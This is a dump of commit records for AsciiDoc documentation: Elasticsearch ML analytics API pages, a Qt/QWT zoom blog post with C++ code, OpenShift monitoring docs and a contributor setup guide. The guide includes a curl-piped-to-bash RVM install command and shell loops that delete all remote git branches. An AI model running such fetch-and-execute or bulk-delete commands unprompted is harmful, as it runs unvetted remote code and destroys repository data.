string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=method]\n \n`n_neighbors`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=n-neighbors]\n \n`outlier_fraction`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=outlier-fraction]\n \n`standardization_enabled`::::\n(Optional, boolean) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=standardization-enabled]\n\/\/End outlier_detection\n=====\n\/\/Begin regression\n`regression`:::\n(Required^*^, object)\nThe configuration information necessary to perform\n{ml-docs}\/dfa-regression.html[{regression}].\n+\nTIP: Advanced parameters are for fine-tuning {reganalysis}. They are set \nautomatically by <<ml-hyperparam-optimization,hyperparameter optimization>> \nto give minimum validation error. 
It is highly recommended to use the default \nvalues unless you fully understand the function of these parameters.\n+\n.Properties of `regression`\n[%collapsible%open]\n=====\n`dependent_variable`::::\n(Required, string)\n+\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dependent-variable]\n+\nThe data type of the field must be numeric.\n\n`eta`::::\n(Optional, double)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=eta]\n\n`feature_bag_fraction`::::\n(Optional, double)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=feature-bag-fraction]\n\n`gamma`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=gamma]\n\n`lambda`::::\n(Optional, double) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=lambda]\n\n`max_trees`::::\n(Optional, integer) \ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=max-trees]\n\n`num_top_feature_importance_values`::::\n(Optional, integer)\nAdvanced configuration option. Specifies the maximum number of\n{ml-docs}\/dfa-regression.html#dfa-regression-feature-importance[feature importance] \nvalues per document to return. By default, it is zero and no feature importance\ncalculation occurs.\n\n`prediction_field_name`::::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=prediction-field-name]\n\n`randomize_seed`::::\n(Optional, long)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=randomize-seed]\n\n`training_percent`::::\n(Optional, integer)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=training-percent]\n=====\n\/\/End regression\n====\n\/\/End analysis\n\n\/\/Begin analyzed_fields\n`analyzed_fields`::\n(Optional, object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields]\n+\n.Properties of `analyzed_fields`\n[%collapsible%open]\n====\n`excludes`:::\n(Optional, array)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields-excludes]\n\n`includes`:::\n(Optional, array)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=analyzed-fields-includes]\n\/\/End analyzed_fields\n====\n\n`description`::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=description-dfa]\n\n`dest`::\n(Required, object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=dest]\n \n`model_memory_limit`::\n(Optional, string)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=model-memory-limit-dfa]\n \n`source`::\n(object)\ninclude::{docdir}\/ml\/ml-shared.asciidoc[tag=source-put-dfa]\n\n[[ml-put-dfanalytics-example]]\n==== {api-examples-title}\n\n[[ml-put-dfanalytics-example-preprocess]]\n===== Preprocessing actions example\n\nThe following example shows how to limit the scope of the analysis to certain \nfields, specify excluded fields in the destination index, and use a query to \nfilter your data before analysis.\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/model-flight-delays-pre\n{\n \"source\": {\n \"index\": [\n \"kibana_sample_data_flights\" <1>\n ],\n \"query\": { <2>\n \"range\": {\n \"DistanceKilometers\": { \n \"gt\": 0\n }\n }\n },\n \"_source\": { <3>\n \"includes\": [],\n \"excludes\": [\n \"FlightDelay\",\n \"FlightDelayType\"\n ]\n }\n },\n \"dest\": { <4>\n \"index\": \"df-flight-delays\",\n \"results_field\": \"ml-results\"\n },\n \"analysis\": {\n \"regression\": {\n \"dependent_variable\": \"FlightDelayMin\",\n \"training_percent\": 90\n }\n },\n \"analyzed_fields\": { <5>\n \"includes\": [],\n \"excludes\": [ \n \"FlightNum\"\n ]\n },\n \"model_memory_limit\": \"100mb\"\n}\n--------------------------------------------------\n\/\/ TEST[skip:setup kibana sample 
data]\n\n<1> The source index to analyze.\n<2> This query filters out entire documents that will not be present in the \ndestination index.\n<3> The `_source` object defines fields in the dataset that will be included or \nexcluded in the destination index. In this case, `includes` does not specify any \nfields, so the default behavior takes place: all the fields of the source index \nwill included except the ones that are explicitly specified in `excludes`.\n<4> Defines the destination index that contains the results of the analysis and \nthe fields of the source index specified in the `_source` object. Also defines \nthe name of the `results_field`.\n<5> Specifies fields to be included in or excluded from the analysis. This does \nnot affect whether the fields will be present in the destination index, only \naffects whether they are used in the analysis.\n\nIn this example, we can see that all the fields of the source index are included \nin the destination index except `FlightDelay` and `FlightDelayType` because \nthese are defined as excluded fields by the `excludes` parameter of the \n`_source` object. The `FlightNum` field is included in the destination index, \nhowever it is not included in the analysis because it is explicitly specified as \nexcluded field by the `excludes` parameter of the `analyzed_fields` object.\n\n\n[[ml-put-dfanalytics-example-od]]\n===== {oldetection-cap} example\n\nThe following example creates the `loganalytics` {dfanalytics-job}, the analysis \ntype is `outlier_detection`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/loganalytics\n{\n \"description\": \"Outlier detection on log data\",\n \"source\": {\n \"index\": \"logdata\"\n },\n \"dest\": {\n \"index\": \"logdata_out\"\n },\n \"analysis\": {\n \"outlier_detection\": {\n \"compute_feature_influence\": true,\n \"outlier_fraction\": 0.05,\n \"standardization_enabled\": true\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:setup_logdata]\n\n\nThe API returns the following result:\n\n[source,console-result]\n----\n{\n \"id\": \"loganalytics\",\n \"description\": \"Outlier detection on log data\",\n \"source\": {\n \"index\": [\"logdata\"],\n \"query\": {\n \"match_all\": {}\n }\n },\n \"dest\": {\n \"index\": \"logdata_out\",\n \"results_field\": \"ml\"\n },\n \"analysis\": {\n \"outlier_detection\": {\n \"compute_feature_influence\": true,\n \"outlier_fraction\": 0.05,\n \"standardization_enabled\": true\n }\n },\n \"model_memory_limit\": \"1gb\",\n \"create_time\" : 1562265491319,\n \"version\" : \"8.0.0\",\n \"allow_lazy_start\" : false\n}\n----\n\/\/ TESTRESPONSE[s\/1562265491319\/$body.$_path\/]\n\/\/ TESTRESPONSE[s\/\"version\" : \"8.0.0\"\/\"version\" : $body.version\/]\n\n\n[[ml-put-dfanalytics-example-r]]\n===== {regression-cap} examples\n\nThe following example creates the `house_price_regression_analysis` \n{dfanalytics-job}, the analysis type is `regression`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/house_price_regression_analysis\n{\n \"source\": {\n \"index\": \"houses_sold_last_10_yrs\"\n },\n \"dest\": {\n \"index\": \"house_price_predictions\"\n },\n \"analysis\": \n {\n \"regression\": {\n \"dependent_variable\": \"price\"\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n\n\nThe API returns the following result:\n\n[source,console-result]\n----\n{\n \"id\" : \"house_price_regression_analysis\",\n 
\"source\" : {\n \"index\" : [\n \"houses_sold_last_10_yrs\"\n ],\n \"query\" : {\n \"match_all\" : { }\n }\n },\n \"dest\" : {\n \"index\" : \"house_price_predictions\",\n \"results_field\" : \"ml\"\n },\n \"analysis\" : {\n \"regression\" : {\n \"dependent_variable\" : \"price\",\n \"training_percent\" : 100\n }\n },\n \"model_memory_limit\" : \"1gb\",\n \"create_time\" : 1567168659127,\n \"version\" : \"8.0.0\",\n \"allow_lazy_start\" : false\n}\n----\n\/\/ TESTRESPONSE[s\/1567168659127\/$body.$_path\/]\n\/\/ TESTRESPONSE[s\/\"version\": \"8.0.0\"\/\"version\": $body.version\/]\n\n\nThe following example creates a job and specifies a training percent:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/student_performance_mathematics_0.3\n{\n \"source\": {\n \"index\": \"student_performance_mathematics\"\n },\n \"dest\": {\n \"index\":\"student_performance_mathematics_reg\"\n },\n \"analysis\":\n {\n \"regression\": {\n \"dependent_variable\": \"G3\",\n \"training_percent\": 70, <1>\n \"randomize_seed\": 19673948271 <2>\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n\n<1> The `training_percent` defines the percentage of the data set that will be \nused for training the model.\n<2> The `randomize_seed` is the seed used to randomly pick which data is used \nfor training.\n\n\n[[ml-put-dfanalytics-example-c]]\n===== {classification-cap} example\n\nThe following example creates the `loan_classification` {dfanalytics-job}, the \nanalysis type is `classification`:\n\n[source,console]\n--------------------------------------------------\nPUT _ml\/data_frame\/analytics\/loan_classification\n{\n \"source\" : {\n \"index\": \"loan-applicants\"\n },\n \"dest\" : {\n \"index\": \"loan-applicants-classified\"\n },\n \"analysis\" : {\n \"classification\": {\n \"dependent_variable\": \"label\",\n \"training_percent\": 75,\n \"num_top_classes\": 2\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[skip:TBD]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fd9862a5851dc601c97794a7e316e34e589cd0d","subject":"fix config link","message":"fix config link\n","repos":"jsight\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,chkal\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,jsight\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/configuration\/index.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/configuration\/index.asciidoc","new_contents":"* link:..\/[docs home]\n\nThere are many types of configuration objects in Rewrite. The most basic `True` and `False` are the root of all other objects. Blah blah more stuff here.\n\n\n* True\n* False\n* And\n* Or\n* Not\n* Condition\n* Operation\n","old_contents":"* link:..\/docs[docs home]\n\nThere are many types of configuration objects in Rewrite. The most basic `True` and `False` are the root of all other objects. 
Blah blah more stuff here.\n\n\n* True\n* False\n* And\n* Or\n* Not\n* Condition\n* Operation\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76feb09778c99d16560b23c707df7ef40bb8025d","subject":"Update 2016-10-23-Google-maps-zoom-theory-and-example-with-Cqt-QWT.adoc","message":"Update 2016-10-23-Google-maps-zoom-theory-and-example-with-Cqt-QWT.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2016-10-23-Google-maps-zoom-theory-and-example-with-Cqt-QWT.adoc","new_file":"_posts\/2016-10-23-Google-maps-zoom-theory-and-example-with-Cqt-QWT.adoc","new_contents":"= Google maps zoom theory and example with {C++\/qt ; QWT}\n\n\n===== Theory\n\nRecently I had to set up a zoom on a qwt plot; the goal was to get the same zoom as Google Maps when zooming on some coordinates. \n\nqwt plot example:\n\nimage:qwt_plot.png[qwt plot, 500, 500, align=\"center\"]\n\nOpen Google Maps and test it: put your cursor on a city and zoom; the whole map is zoomed, but the city always stays under your cursor. \n\nThe solution is easy: the main idea is to rescale your axes with a factor (e.g. 0.9 or 1.1) and to split that factor between the two ends of each axis according to the position of the cursor, in order to zoom or unzoom around it. \n\nWe will assume that the x axis is horizontal and the y axis vertical.\nSo if we want to zoom on the point at (1, 2.5) [(x, y)] we will:\n\n- get the position of our cursor on the widget (x_cursor, y_cursor)\n- compute the percentages (x_percent, y_percent): x_percent is the percentage that the x_cursor position represents of the x_cursor_max position (the maximum size of the widget), and the same for y_percent with y_cursor and y_cursor_max.\n- compute the new x scale by applying x_percent of the factor on one side and (100 - x_percent) of the factor on the other side, and do the same for the y scale with y_percent.\n\nAfter processing all of this we will have the x axis scale [0.2, 4] and the y axis scale [0.4, 8.5].\n\n\n==== Code with c++\/qt and the qwt library:\n\n\nThis code is based on the *PlotMagnifier::rescale(double factor);* function.\n\n[source,cpp]\n----\nvoid My_PlotMagnifier::rescale_on_cursor(double factor, \/\/ the rescale factor (0.9 or 1.1)\n int x_cursor, \/\/ the x, y position of the cursor\n int y_cursor,\n QSize parent_size) \/\/ the max size of the widget\n{\n QwtPlot* plt = plot();\n\n \/\/ max size of the widget\n float x_cursor_max = parent_size.width();\n float y_cursor_max = parent_size.height();\n\n \/\/ percentage position of the cursor in the widget\n float x_percent = (x_cursor * 100) \/ x_cursor_max;\n float y_percent = (y_cursor * 100) \/ y_cursor_max;\n\n \/\/ will be the new lowerBound and upperBound of the scales\n float delta_1 = 0;\n float delta_2 = 0;\n\n _plotScaleEngine->zoomed(true);\n bool doReplot = false;\n const bool autoReplot = plt->autoReplot();\n plt->setAutoReplot( false );\n\n for ( int axisId = 0; axisId < QwtPlot::axisCnt; axisId++ )\n {\n const QwtScaleDiv &scaleDiv = plt->axisScaleDiv( axisId );\n if ( isAxisEnabled( axisId ) )\n {\n double center = scaleDiv.lowerBound() + scaleDiv.range() \/ 2;\t\/\/ Here we set the center of the scale\n const double width_2 = scaleDiv.range() \/ 2 * factor;\t\t\t\/\/ the width wanted between lowerBound (or upper) and the center\n float interval = (scaleDiv.range() \/ 2) - width_2;\t\t\t\t\/\/ the interval between the old width and the wanted width\n\n if (axisId == 0) \t\t\/\/ y - left\n {\n delta_1 = (center - width_2) + (((100 - y_percent) * 
interval) \/ 100) - interval;\n delta_2 = (center + width_2) - ((y_percent * interval) \/ 100) + interval;\n }\n else if (axisId == 2) \t\/\/ x - bottom\n {\n delta_1 = (center - width_2) + (((x_percent * interval) \/ 100)) - interval;\n delta_2 = (center + width_2) - (((100 - x_percent) * interval) \/ 100) + interval;\n }\n else\n {\n delta_1 = 0;\n delta_2 = 0;\n }\n plt->setAxisScale(axisId, delta_1, delta_2);\n doReplot = true;\n }\n }\n plt->setAutoReplot( autoReplot );\n if ( doReplot )\n plt->replot();\n}\n\nvoid My_PlotMagnifier::widgetWheelEvent(QWheelEvent *WheelEvent)\n{\n _plotScaleEngine->getPlot()->select();\n QSize parent_size = this->parentWidget()->size();\n\n if (WheelEvent->delta() > 0) \t\/\/ unzoom\n rescale_on_cursor(0.9, WheelEvent->x(), WheelEvent->y(), parent_size);\n else \t\t\t\t\t\t\t\/\/ zoom\n rescale_on_cursor(1.1, WheelEvent->x(), WheelEvent->y(), parent_size);\n}\n\n\n\n----\n\n\n\n\n\n\n","old_contents":"= Google maps zoom theory and example with {C++\/qt ; QWT}\n\n\n===== Theory\n\nRecently I had to set up a zoom on qwt plot, the goal was to get the same zoom as google maps when zooming on some coordinates. \n\nqwt plot example :\n\nimage:qwt_plot.png[qwt plot, 500, 500, align=\"center\"]\n\nOpen maps and test, put your cursor on a city and zoom, all the map will be zoomed but the city will always be under your cursor. \n\nThe solution is easy the main idea is to reset your scales with a factor (ex : 0.9 or 1.1) and to apply a part of the factor by using the position of the cursor in order to get the zoom or unzoom. \n\nWe will assume that the x axis is the horizontal and y the vertical.\nSo if we want to zoom on the point which is at (1, 2.5) [(x, y)] we will\n\n- get the position of our cursor on the widget (x_cursor, y_cursor)\n- define the percentage (x_max, y_max) which are the percentage of the x_cursor position and the x_cursor_max position (size max of the widget) and the same for y_percent with y_cursor and y_cursor_max.\n- we will compute the new x scale with x_percent of the factor on a side and 100 - x_percent of the factor for the other side and do the same for the y scale with y_percent \/ the factor.\n\nAfter processing all of this we will have the x axis scale [0.2, 4] and the y axis scale [0.4, 8.5].\n\n\n\n==== Code with c++\/qt and qwt library : \n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"319b232a4b6292ad8921f602c7633772eced2151","subject":"Add link to API docs","message":"Add link to API docs\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/monitoring-setting-up-metrics-collection.adoc","new_file":"modules\/monitoring-setting-up-metrics-collection.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * monitoring\/monitoring-your-own-services.adoc\n\n[id=\"setting-up-metrics-collection_{context}\"]\n= Setting up metrics collection\n\nTo use the metrics exposed by your service, you need to configure OpenShift Monitoring to scrape metrics from the `\/metrics` endpoint. You can do this using a ServiceMonitor, a custom resource definition (CRD) that specifies how a service should be monitored, or a PodMonitor, a CRD that specifies how a pod should be monitored. 
The former requires a Service object, while the latter does not, allowing Prometheus to directly scrape metrics from the metrics endpoint exposed by a Pod.\n\nThis procedure shows how to create a ServiceMonitor for the service.\n\n.Prerequisites\n\n* Log in as a cluster administrator or a user with the `monitor-crd-edit` role.\n\n.Procedure\n\n. Create a YAML file for the ServiceMonitor configuration. In this example, the file is called `example-app-service-monitor.yaml`.\n\n. Fill the file with the configuration for creating the ServiceMonitor:\n+\n[source,yaml]\n----\napiVersion: monitoring.coreos.com\/v1\nkind: ServiceMonitor\nmetadata:\n labels:\n k8s-app: prometheus-example-monitor\n name: prometheus-example-monitor\n namespace: ns1\nspec:\n endpoints:\n - interval: 30s\n port: web\n scheme: http\n selector:\n matchLabels:\n app: prometheus-example-app\n----\n+\nThis configuration makes OpenShift Monitoring scrape the metrics exposed by the sample service deployed in \"Deploying a sample service\", which includes the single `version` metric.\n\n. Apply the configuration file to the cluster:\n+\n----\n$ oc apply -f example-app-service-monitor.yaml\n----\n+\nIt will take some time to deploy the ServiceMonitor.\n\n. You can check that the ServiceMonitor is running:\n+\n----\n$ oc -n ns1 get servicemonitor\nNAME AGE\nprometheus-example-monitor 81m\n----\n\n.Additional resources\n\nSee the link:https:\/\/github.com\/openshift\/prometheus-operator\/blob\/release-4.3\/Documentation\/api.md[Prometheus Operator API documentation] for more information on ServiceMonitors and PodMonitors.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * monitoring\/monitoring-your-own-services.adoc\n\n[id=\"setting-up-metrics-collection_{context}\"]\n= Setting up metrics collection\n\nTo use the metrics exposed by your service, you need to configure OpenShift Monitoring to scrape metrics from the `\/metrics` endpoint. You can do this using a ServiceMonitor, a custom resource definition (CRD) that specifies how a service should be monitored, or a PodMonitor, a CRD that specifies how a pod should be monitored. The former requires a Service object, while the latter does not, allowing Prometheus to directly scrape metrics from the metrics endpoint exposed by a Pod.\n\nThis procedure shows how to create a ServiceMonitor for the service.\n\n.Prerequisites\n\n* Log in as a cluster administrator or a user with the `monitor-crd-edit` role.\n\n.Procedure\n\n. Create a YAML file for the ServiceMonitor configuration. In this example, the file is called `example-app-service-monitor.yaml`.\n\n. Fill the file with the configuration for creating the ServiceMonitor:\n+\n[source,yaml]\n----\napiVersion: monitoring.coreos.com\/v1\nkind: ServiceMonitor\nmetadata:\n labels:\n k8s-app: prometheus-example-monitor\n name: prometheus-example-monitor\n namespace: ns1\nspec:\n endpoints:\n - interval: 30s\n port: web\n scheme: http\n selector:\n matchLabels:\n app: prometheus-example-app\n----\n+\nThis configuration makes OpenShift Monitoring scrape the metrics exposed by the sample service deployed in \"Deploying a sample service\", which includes the single `version` metric.\n\n. Apply the configuration file to the cluster:\n+\n----\n$ oc apply -f example-app-service-monitor.yaml\n----\n+\nIt will take some time to deploy the ServiceMonitor.\n\n. 
You can check that the ServiceMonitor is running:\n+\n----\n$ oc -n ns1 get servicemonitor\nNAME AGE\nprometheus-example-monitor 81m\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9bd011e85cf4d5a6614b30ca3435e65960e9783","subject":"Fix an OL formatting error in contributor guide","message":"Fix an OL formatting error in contributor guide\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"contributing_to_docs\/tools_and_setup.adoc","new_file":"contributing_to_docs\/tools_and_setup.adoc","new_contents":"[id=\"contributing-to-docs-tools-and-setup\"]\n= Install and set up the tools and software\n:icons:\n:toc: macro\n:toc-title:\n:toclevels: 1\n:linkattrs:\n:description: How to set up and install the tools to contribute\n\ntoc::[]\n\n== Create a GitHub account\nBefore you can contribute to OpenShift documentation, you must\nhttps:\/\/www.github.com\/join[sign up for a GitHub account].\n\n== Set up authentication\nWhen you have your account set up, follow the instructions to\nhttps:\/\/help.github.com\/articles\/generating-ssh-keys\/[generate and set up SSH\nkeys on GitHub] for proper authentication between your workstation and GitHub.\n\nConfirm authentication is working correctly with the following command:\n\n----\n$ ssh -T git@github.com\n----\n\n== Fork and clone the OpenShift documentation repository\nYou must fork and set up the OpenShift documentation repository on your\nworkstation so that you can create PRs and contribute. These steps must only\nbe performed during initial setup.\n\n. Fork the https:\/\/github.com\/openshift\/openshift-docs repository into your\nGitHub account from the GitHub UI. You can do this by clicking on *Fork* in the\nupper right-hand corner.\n\n. In the terminal on your workstation, change into the directory where you want\nto clone the forked repository.\n\n. Clone the forked repository onto your workstation with the following\ncommand, replacing _<user_name>_ with your actual GitHub username.\n+\n----\n$ git clone git@github.com:<user_name>\/openshift-docs.git\n----\n\n. Change into the directory for the local repository you just cloned.\n+\n----\n$ cd openshift-docs\n----\n\n. Add an upstream pointer back to the OpenShift's remote repository, in this\ncase _openshift-docs_.\n+\n----\n$ git remote add upstream git@github.com:openshift\/openshift-docs.git\n----\n\nThis ensures that you are tracking the remote repository to keep your local\nrepository in sync with it.\n\n== Install AsciiBinder and dependencies\nWhen you have the documentation repository cloned and set up, you are ready to\ninstall the software and tools you will use to create the content. 
All OpenShift\ndocumentation is created in AsciiDoc, and is processed with https:\/\/github.com\/redhataccess\/ascii_binder[AsciiBinder],\nwhich is an http:\/\/asciidoctor.org\/[AsciiDoctor]-based docs management system.\n\n\n=== What you require\nThe following are minimum requirements:\n\n* A bash shell environment (Linux and OS X include a bash shell environment out\nof the box, but if you are on Windows you can use http:\/\/cygwin.com\/[Cygwin])\n* https:\/\/www.ruby-lang.org\/en\/[Ruby]\n* http:\/\/www.git-scm.com\/[Git]\n* A web browser (Firefox, Chrome, or Safari)\n* An editor that can strip trailing whitespace, such as\nlink:https:\/\/atom.io\/[Atom].\n\n=== Install the required software dependencies on a Linux system\nThe following instructions describe how to install all the required tools to do\nlive content editing on a Fedora Linux system.\n\n1. Install the _RubyGems_ package with `yum install rubygems`\n+\n[NOTE]\n====\nOn certain systems, `yum` installs an older version of RubyGems that can cause issues. As an alternative, you can install RubyGems by using RVM. The following example is referenced from the link:https:\/\/rvm.io\/rvm\/install[RVM site]:\n\n[source,terminal]\n----\n$ curl -sSL https:\/\/get.rvm.io | bash -s stable --ruby\n----\n====\n\n2. Install _Ruby_ development packages with `yum install ruby-devel`\n3. Install _gcc_ with `yum install gcc-c++`\n4. Install _redhat-rpm-config_ with `yum install redhat-rpm-config`\n5. Install _make_ with `yum install make`\n6. Install _asciidoctor-diagram_ with `gem install asciidoctor-diagram`\n7. Install the _ascii_binder_ gem with `gem install ascii_binder`\n\nNOTE: If you already have AsciiBinder installed, you might be due for an update.\nThese directions assume that you are using AsciiBinder 0.2.0 or newer. To check\nand update if necessary, simply run `gem update ascii_binder`. Note that you might require root permissions.\n\n=== Building the collection\nWith the initial setup complete, you are ready to build the collection.\n\n1. From the `openshift-docs` directory, run an initial build:\n+\n----\n$ cd openshift-docs\n$ asciibinder build\n----\n2. Open the generated HTML file in your web browser. This will be located in the\n`openshift-docs\/_preview\/<distro>\/<branch>` directory, with the same path and\nfilename as the original `.adoc` file you edited, only it will be with the\n`.html` extension.\n\n== Clean up\nThe `.gitignore` file is set up to prevent anything under the `_preview` and\n`_package` directories from being committed. However, you can reset the\nenvironment manually by running:\n\n----\n$ asciibinder clean\n----\n\n== Next steps\nWith the repository and tools set up on your workstation, you can now either\nedit existing content or create assemblies and modules.\n\n* link:doc_guidelines.adoc[Review the documentation guidelines] to understand\nsome basic guidelines to keep things consistent across our content.\n* link:create_or_edit_content.adoc[Create a local working branch] on your\nworkstation to edit existing content or create content.\n\n=== How to deploy to your own OpenShift cluster for testing\n\nYou can deploy to your own OpenShift cluster for development. This process will use your github repo to launch the website,\nand therefore your github repo must have all of the upstream branches. 
Removing remote branches and updating with upstream branches (this assumes remote repos called `origin` and `upstream`):\n[WARNING]\n====\nThis is a destructive process. Make sure that this is purely a development repo, as all local and remote branches will be deleted\nby running the commands below.\n====\n----\n$ git fetch --all\n$ for branch in $(git branch -r | grep -v \"main\" | grep \"^ origin\"); do git push origin --delete $(echo $branch | cut -d '\/' -f 2); done\n$ git branch -D $(git branch | grep -v 'main' | xargs)\n$ for branch in $(git branch -r | grep -v \"main\" | grep \"^ upstream\"); do git branch --track $(echo $branch | cut -d '\/' -f 2) $(echo $branch | tr -d '[:space:]'); done\n$ for branch in $(git branch | grep -v \"main\"); do git push origin $(echo $branch | tr -d '[:space:]'); done\n----\n\nDeploying the docs site to an OpenShift cluster:\n----\n$ oc process -f asciibinder-template.yml -p NAME=community-docs \\\n -p SOURCE_REPOSITORY_URL=$(git remote get-url origin) \\\n -p SOURCE_REPOSITORY_REF=$(git rev-parse --abbrev-ref HEAD) \\\n -p DOC_TYPE=community \\\n | oc create -f -\n$ oc process -f asciibinder-template.yml -p NAME=commercial-docs \\\n -p SOURCE_REPOSITORY_URL=$(git remote get-url origin) \\\n -p SOURCE_REPOSITORY_REF=$(git rev-parse --abbrev-ref HEAD) \\\n -p DOC_TYPE=commercial \\\n | oc create -f -\n----\n\n[NOTE]\n====\nIf the build fails with \"Fetch source failed\" status, you can\ndelete all the created objects and re-run the above with an HTTP URI\nas the `SOURCE_REPOSITORY_URL`, or you can\nlink:https:\/\/docs.okd.io\/latest\/dev_guide\/builds\/build_inputs.html#source-secrets-combinations[create a source secret]\nand add it to the stg1 build, `oc set build-secret --source bc\/stg1-docs <secret name>`.\n====\n\n\nYou can delete all created objects by running:\n\n----\n$ oc delete all -l app=community-docs\n$ oc delete all -l app=commercial-docs\n----\n","old_contents":"[id=\"contributing-to-docs-tools-and-setup\"]\n= Install and set up the tools and software\n:icons:\n:toc: macro\n:toc-title:\n:toclevels: 1\n:linkattrs:\n:description: How to set up and install the tools to contribute\n\ntoc::[]\n\n== Create a GitHub account\nBefore you can contribute to OpenShift documentation, you must\nhttps:\/\/www.github.com\/join[sign up for a GitHub account].\n\n== Set up authentication\nWhen you have your account set up, follow the instructions to\nhttps:\/\/help.github.com\/articles\/generating-ssh-keys\/[generate and set up SSH\nkeys on GitHub] for proper authentication between your workstation and GitHub.\n\nConfirm authentication is working correctly with the following command:\n\n----\n$ ssh -T git@github.com\n----\n\n== Fork and clone the OpenShift documentation repository\nYou must fork and set up the OpenShift documentation repository on your\nworkstation so that you can create PRs and contribute. These steps must only\nbe performed during initial setup.\n\n. Fork the https:\/\/github.com\/openshift\/openshift-docs repository into your\nGitHub account from the GitHub UI. You can do this by clicking on *Fork* in the\nupper right-hand corner.\n\n. In the terminal on your workstation, change into the directory where you want\nto clone the forked repository.\n\n. 
Clone the forked repository onto your workstation with the following\ncommand, replacing _<user_name>_ with your actual GitHub username.\n+\n----\n$ git clone git@github.com:<user_name>\/openshift-docs.git\n----\n\n. Change into the directory for the local repository you just cloned.\n+\n----\n$ cd openshift-docs\n----\n\n. Add an upstream pointer back to the OpenShift's remote repository, in this\ncase _openshift-docs_.\n+\n----\n$ git remote add upstream git@github.com:openshift\/openshift-docs.git\n----\n\nThis ensures that you are tracking the remote repository to keep your local\nrepository in sync with it.\n\n== Install AsciiBinder and dependencies\nWhen you have the documentation repository cloned and set up, you are ready to\ninstall the software and tools you will use to create the content. All OpenShift\ndocumentation is created in AsciiDoc, and is processed with https:\/\/github.com\/redhataccess\/ascii_binder[AsciiBinder],\nwhich is an http:\/\/asciidoctor.org\/[AsciiDoctor]-based docs management system.\n\n\n=== What you require\nThe following are minimum requirements:\n\n* A bash shell environment (Linux and OS X include a bash shell environment out\nof the box, but if you are on Windows you can use http:\/\/cygwin.com\/[Cygwin])\n* https:\/\/www.ruby-lang.org\/en\/[Ruby]\n* http:\/\/www.git-scm.com\/[Git]\n* A web browser (Firefox, Chrome, or Safari)\n* An editor that can strip trailing whitespace, such as\nlink:https:\/\/atom.io\/[Atom].\n\n=== Install the required software dependencies on a Linux system\nThe following instructions describe how to install all the required tools to do\nlive content editing on a Fedora Linux system.\n\n1. Install the _RubyGems_ package with `yum install rubygems`\n\n[NOTE]\n====\nOn certain systems, `yum` installs an older version of RubyGems that can cause issues. As an alternative, you can install RubyGems by using RVM. The following example is referenced from the link:https:\/\/rvm.io\/rvm\/install[RVM site]:\n\n[source,terminal]\n----\n$ curl -sSL https:\/\/get.rvm.io | bash -s stable --ruby\n----\n====\n\n2. Install _Ruby_ development packages with `yum install ruby-devel`\n3. Install _gcc_ with `yum install gcc-c++`\n4. Install _redhat-rpm-config_ with `yum install redhat-rpm-config`\n5. Install _make_ with `yum install make`\n6. Install _asciidoctor-diagram_ with `gem install asciidoctor-diagram`\n7. Install the _ascii_binder_ gem with `gem install ascii_binder`\n\nNOTE: If you already have AsciiBinder installed, you might be due for an update.\nThese directions assume that you are using AsciiBinder 0.2.0 or newer. To check\nand update if necessary, simply run `gem update ascii_binder`. Note that you might require root permissions.\n\n=== Building the collection\nWith the initial setup complete, you are ready to build the collection.\n\n1. From the `openshift-docs` directory, run an initial build:\n+\n----\n$ cd openshift-docs\n$ asciibinder build\n----\n2. Open the generated HTML file in your web browser. This will be located in the\n`openshift-docs\/_preview\/<distro>\/<branch>` directory, with the same path and\nfilename as the original `.adoc` file you edited, only it will be with the\n`.html` extension.\n\n== Clean up\nThe 